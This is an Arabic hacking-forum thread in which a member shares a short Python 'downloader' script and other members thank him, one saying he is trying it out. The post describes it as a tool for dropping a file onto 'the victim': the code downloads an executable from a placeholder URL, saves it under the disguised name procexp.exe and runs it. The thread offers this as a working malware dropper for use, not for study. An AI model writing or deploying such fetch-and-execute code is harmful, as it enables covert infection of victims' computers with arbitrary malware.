1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : or0 | المشاهدات : 185 | الردود : 3
حالة الموضوع:
مغلق
  1. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    [​IMG]

    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا
    من يهده الله فلا مضل له و من يضلل فلن تجد له ولياً مرشدا
    .و أشهد ألا إله إلا الله وحده لا شريك له و أن
    محمداً عبده و رسوله صلى الله عليه و سلم ...
    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين أما بعد...

    [​IMG]


    كيف حال أخواني في منتدى عراق تيم

    اليوم معنا دون لود بسيط مبرمج بلغة العصر
    python


    سكريبت سهل التعامل معه
    كل معليك هو وضع ربط السرفر المباشر
    و مسار نزول له عند الضحية




    كود

    [HTML CODE]



    #!/usr/bin/python






    import os,sys,time


    import urllib


    import string


    import subprocess






    url = 'http://www.site.com/1.exe'


    filename = 'C:/procexp.exe'


    urllib.urlretrieve(url, filename)


    time.sleep(4)


    subprocess.call(["C:/procexp.exe"])[/HTML CODE]


    الاهداء :

    للجميع بدون إستثناء



    [​IMG]
     
  2. Dr-Ahmed

    Dr-Ahmed Developer

    الأنتساب:
    ‏12 مارس 2015
    المشاركات:
    18
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: كود لغة بايثون | كود للدونلود

    بارك الله بيك اخي الفاضل

     
  3. ȤōŘϴ

    ȤōŘϴ DeveloPer Plus

    الأنتساب:
    ‏24 أكتوبر 2014
    المشاركات:
    303
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: كود لغة بايثون | كود للدونلود

    عاشت ايدك [​IMG]

    جاري التجربة :{13}:
     
  4. KaDiM aL-iRaQi

    KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    18
    رد: كود لغة بايثون | كود للدونلود

    جزآكـَ آلله خيرَ يآغآلي ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة